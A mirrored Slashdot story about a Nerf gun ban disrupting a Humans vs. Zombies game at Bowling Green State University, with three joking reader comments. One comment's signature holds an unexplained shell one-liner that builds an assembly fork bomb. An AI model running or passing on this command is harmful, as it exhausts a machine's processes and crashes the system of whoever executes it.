Slashdot Mirror


Roleplayers Seek Removal of Nerf Gun Ban

An anonymous reader writes "LARP fans at Bowling Green State University may have to contend with a crippled game of Humans vs. Zombies after the University banned Nerf guns on campus. In the live-action game, players are either humans or zombies. The goal of the game is to change all the humans into zombies, or for the humans to evade capture by zombies for a certain amount of time. To defend themselves against zombies, humans may use Nerf guns. Players (most likely the human ones) are petitioning the University to lift the ban. The game had troubles back in 2006, when participating students were arrested. That issue has since been cleared up."

3 of 547 comments (clear)

  1. Title revision suggestion: by uvajed_ekil · · Score: 0, Redundant

    University Students Seek Life

    --
    This is a hacked account, for which the owner can not be held responsible.
  2. Re:Stupid ban by Scrameustache · · Score: 1, Redundant

    Nerf guns don't kill people; hordes of undead flesh-eating zombies do.

    OK, your turn. Braiiiiiiiins...
    --

    You can't take the sky from me...

  3. Re:Why? by Hal_Porter · · Score: 0, Redundant

    a person without a weapon is far less likely to splatter brains everywhere within seconds of deciding to hurt someone. Braiiiinns!
    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;